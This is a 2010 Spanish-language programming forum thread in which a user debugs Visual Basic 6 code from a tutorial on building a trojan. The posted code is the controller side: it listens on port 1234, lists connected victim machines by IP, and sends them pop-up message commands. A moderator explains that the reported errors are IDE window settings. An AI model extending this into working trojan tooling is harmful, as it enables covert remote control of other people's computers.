elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Error de compilacion
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error de compilacion  (Leído 4,865 veces)
Mr.Blue


Desconectado Desconectado

Mensajes: 441



Ver Perfil WWW
Error de compilacion
« en: 20 Agosto 2010, 19:24 pm »

Hola les comento no se mucho de Vb, casi nada pero intentanto compilar un codigo para ver como funciona me tira un error de compilacion: se esperaba: fin de instruccion
seguido de esto

Citar
frmPrincipal = 0, -2, 837, 755, , 22, 26, 544, 480, C
frmMensajes = -11, -5, 703, 662, C, 64, 107, 581, 561, C
Module1 = 184, 184, 820, 697, C

Alguna idea?
disculpen mi ignoracia.
Saludos


En línea

79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: Error de compilacion
« Respuesta #1 en: 20 Agosto 2010, 20:38 pm »

COPIA EL CODIGO DEL MODULE1, FRMPRINCIPAL Y FRMMENSAJES Y TE DIGO ;)

P.D: ESTOY HASTA DENTRO DE MEDIA HORA SINO ESPERA QUE SEGURO TE RESPONDEN.


En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
Mr.Blue


Desconectado Desconectado

Mensajes: 441



Ver Perfil WWW
Re: Error de compilacion
« Respuesta #2 en: 20 Agosto 2010, 21:45 pm »

Código
  1. Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
  2.  
  3. Dim vIndex As Variant
  4. Public TotalIndex As Integer
  5. Public IndexAbir As Integer
  6.  
  7. Private Sub Form_Load()
  8. ws(0).LocalPort = 1234
  9. ws(0).Listen 'Por ahora pondremos el 1234 luego ya veremos...
  10. TotalIndex = 0
  11. End Sub
  12.  
  13. Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
  14. If Cancel = 0 Then
  15.    Dim i As Long
  16.    For i = 1 To Lv.ListItems.Count
  17.        vIndex = Split(Lv.ListItems(i).Key, "|")
  18.        'Mandamos una cadena en blanco a todos los servers para q se desconecten
  19.        ws(vIndex(0)).SendData ""
  20.        Sleep 50
  21.    Next i
  22. End If
  23. End Sub
  24.  
  25. Private Sub Timer1_Timer()
  26. On Error Resume Next
  27. Dim vIndex As Variant
  28. Dim i As Long
  29.  
  30. For i = 1 To Lv.ListItems.Count
  31. vIndex = Split(Lv.ListItems(i).Key, "|")
  32.  
  33. If ws(vIndex(0)).State <> 7 Then 'Si no estamos conectado
  34.    Lv.ListItems.Remove (i) 'Elimnaos la conexion
  35. End If
  36.  
  37. Next i
  38. End Sub
  39.  
  40. Private Sub Lv_MouseDown(Button As Integer, Shift As Integer, x As Single, y As Single)
  41. On Error Resume Next
  42. If Lv.SelectedItem.Selected = False Then Exit Sub 'Si no hay nada selecionado salimos
  43. If Button = 2 Then PopupMenu Menú  ' Lanzamos el menú pop up
  44. End Sub
  45.  
  46. Private Sub ws_ConnectionRequest(Index As Integer, ByVal requestID As Long)
  47. On Error Resume Next
  48. If Index = 0 Then
  49. TotalIndex = 0 'Definimos la varible TotalIndex.
  50. Else
  51. TotalIndex = TotalIndex + 1 'Definimos la varible TotalIndex.
  52. End If
  53.  
  54. ws(Index).Close
  55. ws(Index).Accept requestID 'Y aceptamos la conexion
  56. Load ws(Index + 1) 'Cargamos un nuevo index
  57. ws(Index + 1).LocalPort = 1234 '
  58. IndexAbir = Index + 1 'Definimos la varible IndexAbir.
  59. ws(IndexAbir).Listen 'Escuhamos el puerto asignado.
  60. End Sub
  61.  
  62. Private Sub ws_DataArrival(Index As Integer, ByVal bytesTotal As Long)
  63. Dim Datos As String
  64. Dim vDatos As Variant
  65.  
  66. ws(Index).GetData Datos
  67. vDatos = Split(Datos, "|")
  68.  
  69. Select Case vDatos(0)
  70. Case "hola" 'Nos saludan, luego lo añadiremos a la lista xDD
  71.    Lv.ListItems.Add(, Index & "|", "Nuevo").SubItems(1) = ws(Index).RemoteHostIP
  72.  
  73. End Select
  74.  
  75. End Sub
  76.  
  77.  
  78. '-------------------------------- Menús ------------------------------
  79.  
  80. Private Sub Mensajes_Click()
  81. frmMensajes.Show
  82. End Sub
  83.  
  84.  
  85.  
Es el codigo de EON, del tutorial de como crear un troyano, lo quiero probar haber como funciona. y ver como funciona la codificacion echa en Vb.
No entiendo como leer estos errores que me tira el compilador
Citar
frmPrincipal = 0, -2, 837, 755, , 22, 26, 544, 480, C
frmMensajes = -11, -5, 703, 662, C, 64, 107, 581, 561, C
Module1 = 184, 184, 820, 697, C
Como se supone que los leea? es la linea de codigo? me parece raro porq la linea 755 no hay :P
Saludos
« Última modificación: 21 Agosto 2010, 01:35 am por Sr.Blanco » En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Error de compilacion
« Respuesta #3 en: 21 Agosto 2010, 21:14 pm »


Citar
frmPrincipal = 0, -2, 837, 755, , 22, 26, 544, 480, C
frmMensajes = -11, -5, 703, 662, C, 64, 107, 581, 561, C
Module1 = 184, 184, 820, 697, C


ese codigo no es el codigo fuente del programa, es del archivo .vbw que guarda informacion sobre el las ventanas y demas en el IDE...no es el codigo fuente del programa.



acabo de pegar el codigo que pusiste y no me tira ningun error...me imagino que tenes un control winsock llamado ws con el indice en 0, y un listview llamado Lv en el formulario ?

saludos.
En línea

Mr.Blue


Desconectado Desconectado

Mensajes: 441



Ver Perfil WWW
Re: Error de compilacion
« Respuesta #4 en: 22 Agosto 2010, 01:17 am »

Gracias seba123neo por tu pronta respuesta, mira esto es lo que me falto de codigo que es el frmMensajes

Código
  1. Dim vIndex As Variant
  2.  
  3. 'Enviamos el mensaje segun la opcion que se elija
  4. 'El prefijo para enviar un msj al servidor es "mensj"
  5. 'Y luego va el tipo de mensaje a enviar:
  6.  
  7. Private Sub Command1_Click()
  8.  
  9. If Option1.Value = True Then
  10.    frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "error" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
  11. End If
  12. If Option2.Value = True Then
  13.    frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "info" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
  14. End If
  15. If Option3.Value = True Then
  16.    frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "interrog" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
  17. End If
  18. If Option4.Value = True Then
  19.    frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "adver" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
  20. End If
  21.  
  22. End Sub
  23.  
  24. Private Sub Form_Load()
  25. On Error Resume Next
  26. vIndex = Split(frmPrincipal.Lv.SelectedItem.Key, "|")
  27. Option1.Value = True
  28. End Sub
  29.  

Este es el codigo del FrmMensajes lo tengo como .frm
 
El anterior era el codigo del FrmPrincipal este tambien .frm
Despues tengo un Modulo .vbw que cuando lo abro aparecen esos errores.

Citar
acabo de pegar el codigo que pusiste y no me tira ningun error...me imagino que tenes un control winsock llamado ws con el indice en 0, y un listview llamado Lv en el formulario ?

Creo que si, y en componentes tengo activado el Microsoft Windows Common Controls 6.0 (SP4)
Y el Microsoft Winsock Controls 6.0


Otra cosa no se si sea de importancia, pero tengo el VB 6.0 portable, no creo q influya en nada, el SP4 no se si tengo que actualizarlo a SP6, bueno lo dejo como dato por las dudas.

Gracias nuevamente.
Saludos.


-----------------------------------------------------------------------------------------------
Edito: Ya lo solucione :P jaja, mejor no digo nada porq era una boludes  :laugh:
« Última modificación: 22 Agosto 2010, 01:37 am por Sr.Blanco » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error de compilacion con GCC, libreria iostream « 1 2 »
Programación C/C++
eternoneofito 16 23,652 Último mensaje 23 Agosto 2011, 00:20 am
por rir3760
error de compilacion
Programación C/C++
Chazy Chaz 1 2,634 Último mensaje 17 Octubre 2011, 14:28 pm
por Eternal Idol
error de compilacion por fwrite, ¿porque ?
Programación C/C++
ALCales 3 2,510 Último mensaje 10 Enero 2012, 23:54 pm
por Eternal Idol
Error de compilación en Dev C++ raro
Programación C/C++
Kasswed 9 4,786 Último mensaje 8 Mayo 2012, 00:34 am
por n0z
UE3 D3DDrv Error de Compilacion
Programación C/C++
arkeim 0 1,762 Último mensaje 22 Julio 2012, 19:24 pm
por arkeim
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines